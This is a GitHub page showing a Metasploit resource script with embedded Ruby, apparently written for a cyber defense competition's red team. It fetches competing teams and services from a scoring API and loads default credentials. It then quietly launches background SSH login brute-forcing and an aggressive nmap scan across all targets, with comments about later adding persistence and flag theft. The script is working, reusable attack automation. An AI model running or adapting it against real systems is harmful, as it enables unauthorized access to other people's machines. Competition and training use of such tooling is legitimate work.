-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcdc_autopwn.rc
99 lines (74 loc) · 2.52 KB
/
cdc_autopwn.rc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
# Author @TheToddLuci0
# https://github.com/TheToddLuci0
<ruby>
require 'resolv'
# Put any creds you think may exist in this list (Passwords only)
# Use the username as the 'key' and the password as the 'value'
creds = {"root"=> "cdc",
"cdc"=> "cdc"}
puts
puts "************************"
puts "Aquiring Targets"
puts "************************"
puts
s_uri = URI("https://iscore.iseage.org/api/v1/services")
services = Net::HTTP.get(s_uri)
services = JSON.parse(services)
t_uri = URI("https://iscore.iseage.org/api/v1/teams")
teams = Net::HTTP.get(t_uri)
teams = JSON.parse(teams)
dns_names = Array.new
nums = []
teams.each do |team|
# IScorE returns only active teams, so we do this to make sure that we only target the real teams.
nums.append(team["number"])
end
puts "Found " + nums.length().to_s + " teams"
ssh_targets = []
services.each do |serv|
nums.each do |n|
# ip = Resolv.getaddress(serv["url"].gsub("{num}", n.to_s))
# framework.db.report_host(host: ip)
dns_names.append(serv["url"].gsub("{num}", n.to_s))
if serv["protocol"] == "SSH"
ssh_targets.append(serv["url"].gsub("{num}", n.to_s))
end
end
end
puts "Found " + dns_names.length().to_s + " target DNS names"
puts
puts "************************"
puts "Loading creds"
puts "************************"
puts
# TODO: Consider moving this to a file of some kind, rahter than a hash at the top
creds.keys.each do |user|
run_single("creds add user:" + user + " password:" +creds[user])
end
puts "Loaded " + creds.length().to_s + " creds"
puts
puts "************************"
puts "Attempting SSH attacks"
puts "************************"
puts
# We do this first, because this is the thing that is most likely to be easily exploited, using the default creds
puts ssh_targets.length().to_s + " targets"
run_single("use auxiliary/scanner/ssh/ssh_login")
run_single("set DB_ALL_PASS true")
run_single("set DB_ALL_USERS true")
run_single("set BLANK_PASSWORDS true")
run_single("set RHOSTS " + ssh_targets.join(','))
run_single("run -j -q") # Run this in the background, and do it quietly
# TODO: Consider adding automated post connection stuff, ie persistance, flag nabbing
puts
puts "************************"
puts "Running db_nmap"
puts "************************"
puts
# Let's load the database with some more actionable information about all the CDC hosts
# Using the flags we are so as to make this take less than the whole eight hours
run_single('db_nmap -A -T5 --top-ports 100 ' + dns_names.join(' '))
</ruby>
# Tell us where the script left us
jobs
sessions